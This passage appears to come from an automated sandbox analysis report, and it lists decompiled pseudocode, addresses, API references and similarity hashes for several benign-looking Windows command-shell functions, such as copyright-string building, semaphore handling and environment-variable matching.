                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswdigit$wcstol
                                              • String ID: C?,:$aApP
                                              • API String ID: 644763121-1926286281
                                              • Opcode ID: 18fb3f35e57a3e620f524d316bbac4c00a6a186e86c6e901e8687ceaa9436bb1
                                              • Instruction ID: ed21f86a3e8b13a23c6b210c85d530681230b3ccbbfa03eee7ddcd0f095e6090
                                              • Opcode Fuzzy Hash: 18fb3f35e57a3e620f524d316bbac4c00a6a186e86c6e901e8687ceaa9436bb1
                                              • Instruction Fuzzy Hash: BD410675A2011386CF24EF64D8A6F7FB3B5AF55310714062EFC46DB680EA30CDA2C652
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C6456, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E002C6456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E002B7735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0x2ec000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E002B6FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}




































                                              0x002c645e
                                              0x002c6465
                                              0x002c646d
                                              0x002c646e
                                              0x002c6476
                                              0x002c6478
                                              0x002c647a
                                              0x002c647c
                                              0x002c6485
                                              0x002c64a9
                                              0x00000000
                                              0x002c64af
                                              0x002c64af
                                              0x002c64b2
                                              0x00000000
                                              0x002c64b2
                                              0x002c6487
                                              0x002c648c
                                              0x002c6492
                                              0x002c6494
                                              0x002c64b5
                                              0x002c64b7
                                              0x002c6589
                                              0x002c6589
                                              0x002c64bd
                                              0x002c64bd
                                              0x002c64c0
                                              0x002c64c5
                                              0x002c64c7
                                              0x002c64ce
                                              0x002c64d1
                                              0x002c64e3
                                              0x002c64dd
                                              0x002c64dd
                                              0x002c64dd
                                              0x002c64e4
                                              0x002c64e7
                                              0x002c64e9
                                              0x002c64ec
                                              0x002c64ee
                                              0x002c64f3
                                              0x002c64f3
                                              0x002c64f6
                                              0x002c64f8
                                              0x002c64fb
                                              0x002c64fb
                                              0x002c64fe
                                              0x002c6501
                                              0x002c651d
                                              0x002c651f
                                              0x002c6524
                                              0x002c6526
                                              0x002c6529
                                              0x002c652b
                                              0x002c6530
                                              0x002c6537
                                              0x002c653c
                                              0x002c653f
                                              0x002c654d
                                              0x002c654e
                                              0x002c6553
                                              0x002c6554
                                              0x002c6558
                                              0x002c655d
                                              0x002c655e
                                              0x002c6546
                                              0x002c6546
                                              0x002c6546
                                              0x002c6561
                                              0x002c6564
                                              0x002c6567
                                              0x002c656a
                                              0x002c656c
                                              0x002c6571
                                              0x002c6574
                                              0x002c6574
                                              0x002c6579
                                              0x002c657b
                                              0x002c657b
                                              0x002c657f
                                              0x002c6585
                                              0x002c6585
                                              0x002c64b7
                                              0x002c659b

                                              APIs
                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 002C64A1
                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 002C6517
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 002C657F
                                              Strings
                                              • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 002C646E
                                              • %WINDOWS_COPYRIGHT%, xrefs: 002C6487
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                              • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                              • API String ID: 1103618819-4062316587
                                              • Opcode ID: d476f745ceb847f58776d0463d3eaedb2a75fa3c43988d50973be88c3e24f066
                                              • Instruction ID: d316b0b6cdbb559ceaa00653454d1534b3e2393d8c2a8443bc1599bfa65d321c
                                              • Opcode Fuzzy Hash: d476f745ceb847f58776d0463d3eaedb2a75fa3c43988d50973be88c3e24f066
                                              • Instruction Fuzzy Hash: BC410A35A602568BCB30CFA89848BBA73B5EF48750BA4016DE945DB344EA75DD53C390
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C2BF0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E002C2BF0(void* __ecx, int* _a4) {
				void* _v0;
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short* _t25;
				void* _t30;
				void* _t38;
				WCHAR* _t40;
				int* _t41;
				void* _t46;
				void* _t50;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t22 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t22 ^ _t59;
				_t41 = _a4;
				 *_t41 = 0;
				_t41[1] = 0;
				E002B1040( &_v528, 0x104, __ecx);
				_t52 = 0x104;
				_t25 =  &_v528;
				while( *_t25 != 0) {
					_t25 = _t25 + 2;
					_t52 = _t52 - 1;
					if(_t52 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t46 =  ~_t52 & 0x00000104 - _t52;
				if(_t52 != 0) {
					_t40 =  &(( &_v528)[_t46]);
					_t58 = 0x104 - _t46;
					if(_t58 == 0) {
						L11:
						_t40 = _t40 - 2;
					} else {
						_t50 = 0x7ffffffe;
						_t52 = L"_p0" - _t40;
						while(_t50 != 0) {
							_t55 =  *(_t40 + _t52) & 0x0000ffff;
							if(_t55 == 0) {
								break;
							} else {
								 *_t40 = _t55;
								_t50 = _t50 - 1;
								_t40 =  &(_t40[1]);
								_t58 = _t58 - 1;
								if(_t58 != 0) {
									continue;
								} else {
									goto L11;
								}
							}
							goto L12;
						}
						if(_t58 == 0) {
							goto L11;
						}
					}
					L12:
					_t46 = 0;
					 *_t40 = 0;
				}
				_t57 = OpenSemaphoreW(0x1f0003, 0,  &_v528);
				_v532 = _t57;
				if(_t57 != 0) {
					_t52 =  &_v536;
					_v536 = 0;
					_t46 = _t57;
					_t30 = E002C213A(_t46, _t52);
					_t54 = _t30;
					if(_t30 >= 0) {
						asm("cdq");
						 *_t41 = _v536;
						_t41[1] = _t52;
						goto L19;
					} else {
						_t46 = _v0;
						_t52 = 0xce;
						E002C292C("wil", _t54);
						_t57 = _v532;
					}
				} else {
					if(GetLastError() == 2) {
						L19:
						_t54 = 0;
					} else {
						_t46 = _v0;
						_t52 = 0xc8;
						_t38 = E002C2913("wil");
						_t57 = _v532;
						_t54 = _t38;
					}
				}
				if(_t57 != 0 && CloseHandle(_t57) == 0) {
					_push(_t46);
					_t52 = 0x879;
					E002C2D56();
				}
				return E002B6FD0(_t54, _t41, _v8 ^ _t59, _t52, _t54, _t57);
			}
























                                              0x002c2bfb
                                              0x002c2c02
                                              0x002c2c06
                                              0x002c2c11
                                              0x002c2c19
                                              0x002c2c26
                                              0x002c2c2b
                                              0x002c2c2d
                                              0x002c2c33
                                              0x002c2c39
                                              0x002c2c3c
                                              0x002c2c3f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c2c3f
                                              0x002c2c49
                                              0x002c2c4b
                                              0x002c2c4f
                                              0x002c2c57
                                              0x002c2c5a
                                              0x002c2c5c
                                              0x002c2c8f
                                              0x002c2c8f
                                              0x002c2c5e
                                              0x002c2c63
                                              0x002c2c68
                                              0x002c2c70
                                              0x002c2c74
                                              0x002c2c7b
                                              0x00000000
                                              0x002c2c7d
                                              0x002c2c7d
                                              0x002c2c80
                                              0x002c2c81
                                              0x002c2c84
                                              0x002c2c87
                                              0x00000000
                                              0x002c2c89
                                              0x00000000
                                              0x002c2c89
                                              0x002c2c87
                                              0x00000000
                                              0x002c2c7b
                                              0x002c2c8d
                                              0x00000000
                                              0x00000000
                                              0x002c2c8d
                                              0x002c2c92
                                              0x002c2c92
                                              0x002c2c94
                                              0x002c2c94
                                              0x002c2cab
                                              0x002c2cad
                                              0x002c2cb5
                                              0x002c2cde
                                              0x002c2ce4
                                              0x002c2cee
                                              0x002c2cf0
                                              0x002c2cf5
                                              0x002c2cf9
                                              0x002c2d1c
                                              0x002c2d1d
                                              0x002c2d1f
                                              0x00000000
                                              0x002c2cfb
                                              0x002c2cfb
                                              0x002c2cfe
                                              0x002c2d09
                                              0x002c2d0e
                                              0x002c2d0e
                                              0x002c2cb7
                                              0x002c2cc0
                                              0x002c2d22
                                              0x002c2d22
                                              0x002c2cc2
                                              0x002c2cc2
                                              0x002c2cc5
                                              0x002c2ccf
                                              0x002c2cd4
                                              0x002c2cda
                                              0x002c2cda
                                              0x002c2cc0
                                              0x002c2d26
                                              0x002c2d33
                                              0x002c2d37
                                              0x002c2d3c
                                              0x002c2d3c
                                              0x002c2d53

                                              APIs
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 002C2CA5
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C2CB7
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 002C2D29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseErrorHandleLastOpenSemaphore
                                              • String ID: _p0$wil
                                              • API String ID: 3419097560-1814513734
                                              • Opcode ID: 945699245948bae86728fa402a939f32b377321324943353737b6aced3fb76af
                                              • Instruction ID: da6aaf24347c1ccc35e00bcf452f70e3fc2984fba6ff8375d0751c65c1f1add8
                                              • Opcode Fuzzy Hash: 945699245948bae86728fa402a939f32b377321324943353737b6aced3fb76af
                                              • Instruction Fuzzy Hash: F341F871A5012ACBCB25DF24C949FAA37B5EF95700F1583ADE80A9B244DF70CE59CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4588, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E002C4588(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr _t41;
				void* _t47;
				void* _t49;
				intOrPtr* _t50;
				signed int _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t58;
				void* _t59;

				_t33 =  *0x2d3834;
				_v20 = __ecx;
				if(_t33 != 0) {
					_t53 = E002ADF40(E002ADEF9(__ecx));
					_v12 = _t53;
					if(_t53 == 0) {
						L2:
						return 1;
					}
					_t47 = 0x20;
					_t23 = E002B2349(_t53, _t47);
					if(_t23 != 0) {
						 *_t23 = 0;
					}
					_t50 = _t53;
					_v16 = 0;
					_t4 = _t50 + 2; // 0x2
					_t38 = _t4;
					do {
						_t24 =  *_t50;
						_t50 = _t50 + 2;
					} while (_t24 != 0);
					_t54 = _t33;
					_t52 = _t50 - _t38 >> 1;
					_v8 = 1;
					_t41 = _t54 + 2;
					do {
						_t25 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t25 != 0);
					_t55 = _t54 - _t41;
					_t56 = _t55 >> 1;
					if(_t55 == 0) {
						L22:
						E002AC5A2(_t41, 0x400023a9, 1, _v20);
						L23:
						E002B0040(_v12);
						return _v8;
					}
					while( *0x2cd544 == 0) {
						if(_t56 < _t52) {
							L15:
							_t41 = _v8;
							L16:
							_t33 = _t33 + _t56 * 2 + 2;
							_t57 = _t33;
							_t49 = _t57 + 2;
							do {
								_t25 =  *_t57;
								_t57 = _t57 + 2;
							} while (_t25 != _v16);
							_t58 = _t57 - _t49;
							_t56 = _t58 >> 1;
							if(_t58 != 0) {
								continue;
							}
							L21:
							if(_t41 == 0) {
								goto L23;
							}
							goto L22;
						}
						__imp___wcsnicmp(_t33, _v12, _t52);
						_t59 = _t59 + 0xc;
						if(_t25 != 0) {
							goto L15;
						}
						_push(_t33);
						E002B25D9(L"%s\r\n");
						_t41 = 0;
						_v8 = 0;
						goto L16;
					}
					_t41 = _v8;
					goto L21;
				}
				_push("Null environment");
				fprintf(E002B7721(__ecx, 2), "\nCMD Internal Error %s\n");
				goto L2;
			}
























                                              0x002c4591
                                              0x002c4599
                                              0x002c45a0
                                              0x002c45d2
                                              0x002c45d4
                                              0x002c45d9
                                              0x002c45be
                                              0x00000000
                                              0x002c45c0
                                              0x002c45dd
                                              0x002c45e0
                                              0x002c45e7
                                              0x002c45eb
                                              0x002c45eb
                                              0x002c45ee
                                              0x002c45f2
                                              0x002c45f5
                                              0x002c45f5
                                              0x002c45f8
                                              0x002c45f8
                                              0x002c45fb
                                              0x002c45fe
                                              0x002c4605
                                              0x002c4609
                                              0x002c460c
                                              0x002c460f
                                              0x002c4612
                                              0x002c4612
                                              0x002c4615
                                              0x002c4618
                                              0x002c461d
                                              0x002c461f
                                              0x002c4621
                                              0x002c4681
                                              0x002c468b
                                              0x002c4693
                                              0x002c4696
                                              0x00000000
                                              0x002c469b
                                              0x002c4623
                                              0x002c462e
                                              0x002c4658
                                              0x002c4658
                                              0x002c465b
                                              0x002c465e
                                              0x002c4661
                                              0x002c4663
                                              0x002c4666
                                              0x002c4666
                                              0x002c4669
                                              0x002c466c
                                              0x002c4672
                                              0x002c4674
                                              0x002c4676
                                              0x00000000
                                              0x00000000
                                              0x002c467d
                                              0x002c467f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c467f
                                              0x002c4635
                                              0x002c463b
                                              0x002c4640
                                              0x00000000
                                              0x00000000
                                              0x002c4642
                                              0x002c4648
                                              0x002c4651
                                              0x002c4653
                                              0x00000000
                                              0x002c4653
                                              0x002c467a
                                              0x00000000
                                              0x002c467a
                                              0x002c45a2
                                              0x002c45b5
                                              0x00000000

                                              APIs
                                              • _wcsnicmp.MSVCRT ref: 002C4635
                                                • Part of subcall function 002B7721: __iob_func.MSVCRT ref: 002B7726
                                              • fprintf.MSVCRT ref: 002C45B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: __iob_func_wcsnicmpfprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 1828771275-2781220306
                                              • Opcode ID: d239a7d740fca30bbdbcc3eb9fd2f8de55872a25b5ddda0681e2a9e005427e9c
                                              • Instruction ID: e66177e9b1b97702a399c3c99fe8269bde00ccd7a8b40737872c955e55d571e1
                                              • Opcode Fuzzy Hash: d239a7d740fca30bbdbcc3eb9fd2f8de55872a25b5ddda0681e2a9e005427e9c
                                              • Instruction Fuzzy Hash: EF313C32E20212DBCB28FF689C55FAFB3A4DF55740F15066DEC1AA3644EA705E218A54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C579A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 51%
                                              			E002C579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E002B7797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0x2ec018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E002B00B0(0);
						if(_t41 == 0) {
							L3:
							E002C9287(_t28);
							__imp__longjmp(0x2db8b8, 1);
						}
						_t28 = 0;
						_t25 = E002B00B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E002B7797(0) != 0) {
							 *0x2ec018(0, _t25);
						}
						_t29 =  *0x2d3854;
						_t13 = E002B0638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E002B33FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t6 =  &_v8; // 0x2b3a4e
							_t25 =  *_t6;
						}
						SetErrorMode(_t46);
						_t7 = E002B0040(_t25);
					}
				}
				return _t7;
			}


















                                              0x002c579f
                                              0x002c57a3
                                              0x002c57aa
                                              0x002c57b4
                                              0x002c57be
                                              0x002c57c4
                                              0x002c57cc
                                              0x002c57d0
                                              0x002c57d2
                                              0x002c57d2
                                              0x002c57de
                                              0x002c57de
                                              0x002c57e4
                                              0x002c57eb
                                              0x002c57ed
                                              0x002c57f2
                                              0x00000000
                                              0x00000000
                                              0x002c57fb
                                              0x002c57ff
                                              0x002c57ff
                                              0x002c5805
                                              0x002c580b
                                              0x002c5816
                                              0x002c581d
                                              0x002c582b
                                              0x002c5832
                                              0x002c5834
                                              0x002c5838
                                              0x002c583c
                                              0x002c5841
                                              0x002c5843
                                              0x002c5843
                                              0x002c5846
                                              0x002c5846
                                              0x002c5849
                                              0x002c584c
                                              0x002c5857
                                              0x002c585b
                                              0x002c585e
                                              0x002c5863
                                              0x002c5863
                                              0x002c5863
                                              0x002c5867
                                              0x002c586f
                                              0x002c586f
                                              0x002c57be
                                              0x002c587a

                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • longjmp.MSVCRT(002DB8B8,00000001,?,?,002B3A4E,?,?,?,?,?,?,?,?), ref: 002C57DE
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,002B3A4E), ref: 002C581D
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,002B3A4E), ref: 002C5825
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,002B3A4E), ref: 002C5867
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                              • String ID: N:+
                                              • API String ID: 162963024-206593761
                                              • Opcode ID: 01a3753680cdd39b6034a797e20ba6661e50221b423c6f7e8368f21237862f9b
                                              • Instruction ID: d0c7ff8adfe81a84f8366b9c00242e71b954dc390ef1f9fc3790562c6e9cefb6
                                              • Opcode Fuzzy Hash: 01a3753680cdd39b6034a797e20ba6661e50221b423c6f7e8368f21237862f9b
                                              • Instruction Fuzzy Hash: B7210436610612ABC720AF749C99ABF735ADFC43507180328FD068B291EE30DDA686A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AAEB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77stringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E002AAEB0(void* __ecx, intOrPtr _a4) {
				wchar_t* _v8;
				wchar_t* _v12;
				long _t25;
				signed int _t26;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int _t36;
				intOrPtr _t45;
				long _t48;
				signed int _t49;

				_t45 = _a4;
				_t48 = wcstol( *(_t45 + 0x38),  &_v8, 0);
				_t25 = wcstol( *(_t45 + 0x3c),  &_v12, 0);
				if( *_v8 != 0 ||  *_v12 != 0) {
					_push( *(_t45 + 0x3c));
					_push( *(_t45 + 0x38));
					if(( *(_t45 + 0x40) & 0x00000002) != 0) {
						_t26 = lstrcmpiW();
					} else {
						_t26 = lstrcmpW();
					}
					_t49 = _t26;
					goto L3;
				} else {
					_t49 = _t48 - _t25;
					L3:
					_t28 =  *((intOrPtr*)(_t45 + 0x44)) - 1;
					if(_t28 == 0) {
						_t30 = 0 | _t49 == 0x00000000;
						L9:
						return _t30;
					}
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t30 = 0 | _t49 != 0x00000000;
						goto L9;
					}
					_t33 = _t31 - 1;
					if(_t33 == 0) {
						L14:
						_t30 = _t49 >> 0x1f;
						goto L9;
					}
					_t34 = _t33 - 1;
					if(_t34 == 0) {
						_t30 = 0 | _t49 <= 0x00000000;
						goto L9;
					}
					_t36 = _t34 - 1;
					if(_t36 != 0) {
						if(_t36 != 1) {
							_t30 = 0;
							goto L9;
						}
						_t49 =  !_t49;
						goto L14;
					}
					_t30 = _t36 & 0xffffff00 | _t49 > 0x00000000;
					goto L9;
				}
			}
















                                              0x002aaeba
                                              0x002aaecd
                                              0x002aaed7
                                              0x002aaee6
                                              0x002aaf49
                                              0x002aaf4c
                                              0x002aaf4f
                                              0x002aaf5b
                                              0x002aaf51
                                              0x002aaf51
                                              0x002aaf51
                                              0x002aaf57
                                              0x00000000
                                              0x002aaef0
                                              0x002aaef0
                                              0x002aaef2
                                              0x002aaef5
                                              0x002aaef8
                                              0x002aaf20
                                              0x002aaf13
                                              0x002aaf19
                                              0x002aaf19
                                              0x002aaefa
                                              0x002aaefd
                                              0x002aaf29
                                              0x00000000
                                              0x002aaf29
                                              0x002aaeff
                                              0x002aaf02
                                              0x002aaf35
                                              0x002aaf38
                                              0x00000000
                                              0x002aaf38
                                              0x002aaf04
                                              0x002aaf07
                                              0x002aaf40
                                              0x00000000
                                              0x002aaf40
                                              0x002aaf09
                                              0x002aaf0c
                                              0x002aaf31
                                              0x002aaf63
                                              0x00000000
                                              0x002aaf63
                                              0x002aaf33
                                              0x00000000
                                              0x002aaf33
                                              0x002aaf10
                                              0x00000000
                                              0x002aaf10

                                              APIs
                                              • wcstol.MSVCRT ref: 002AAEC7
                                              • wcstol.MSVCRT ref: 002AAED7
                                              • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 002AAF51
                                              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 002AAF5B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcstol$lstrcmplstrcmpi
                                              • String ID: ixthxt
                                              • API String ID: 4273384694-1465016018
                                              • Opcode ID: 1fa7db74dabee66bb10adc47332b9424439d17be732925c6febd2df8e7af39d7
                                              • Instruction ID: 26d41a1ad66d98f5b13aca438aa5e993044c587e8f73af8e0dd717a0ab693525
                                              • Opcode Fuzzy Hash: 1fa7db74dabee66bb10adc47332b9424439d17be732925c6febd2df8e7af39d7
                                              • Instruction Fuzzy Hash: F911D2B2930427BF87695EB89A4C8767B68FF023507110254ED01DBE50DB63DD74D2E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A68D9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E002A68D9(void* __ecx, intOrPtr __edx, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t16;
				signed int _t19;
				signed int _t21;
				intOrPtr _t24;
				signed int _t38;
				long _t40;
				signed short* _t44;

				_push(__ecx);
				_push(__ecx);
				_v12 = __edx;
				_t44 = E002ADEF9(__ecx);
				_t16 =  *_t44 & 0x0000ffff;
				if(_t16 != 0x3a) {
					if(_t16 != 0x2b) {
						goto L2;
					} else {
						goto L1;
					}
					L10:
					_t19 = _v8;
					 *((short*)(_v12 + _t19 * 2)) = 0;
					return _t19;
					L17:
				} else {
					L1:
					_t44 =  &(_t44[1]);
				}
				L2:
				_t24 = _a8;
				if(_t24 == 0) {
					_t44 = E002ADEF9(_t44);
				}
				_v8 = _v8 & 0x00000000;
				_t40 =  *_t44 & 0x0000ffff;
				while(_t24 == 0 || wcschr(L"=,;", _t40) == 0) {
					if(wcschr(L"+:\n\r\t ", _t40) == 0) {
						if(_t24 == 0) {
							if(E002AD7D4(L"&<|>", _t40) == 0) {
								if(_t40 != 0x5e) {
									goto L8;
								} else {
									_t44 =  &(_t44[1]);
									_t38 =  *_t44 & 0x0000ffff;
									goto L9;
								}
								goto L17;
							}
						} else {
							L8:
							_t38 = _t40 & 0x0000ffff;
							L9:
							_t32 = _v8;
							_t44 =  &(_t44[1]);
							_t7 = _t32 + 1; // 0x1
							_t21 = _t7;
							 *(_v12 + _v8 * 2) = _t38;
							_t40 =  *_t44 & 0x0000ffff;
							_v8 = _t21;
							if(_t21 < 0x7f) {
								continue;
							}
						}
					}
					goto L10;
				}
				goto L10;
			}












                                              0x002a68de
                                              0x002a68df
                                              0x002a68e3
                                              0x002a68eb
                                              0x002a68ed
                                              0x002a68f3
                                              0x002a6970
                                              0x00000000
                                              0x002a6972
                                              0x00000000
                                              0x002a6972
                                              0x002a6958
                                              0x002a6958
                                              0x002a6963
                                              0x002a696a
                                              0x00000000
                                              0x002a68f5
                                              0x002a68f5
                                              0x002a68f5
                                              0x002a68f5
                                              0x002a68f8
                                              0x002a68f8
                                              0x002a68fd
                                              0x002bbe67
                                              0x002bbe67
                                              0x002a6903
                                              0x002a6907
                                              0x002a690a
                                              0x002a6930
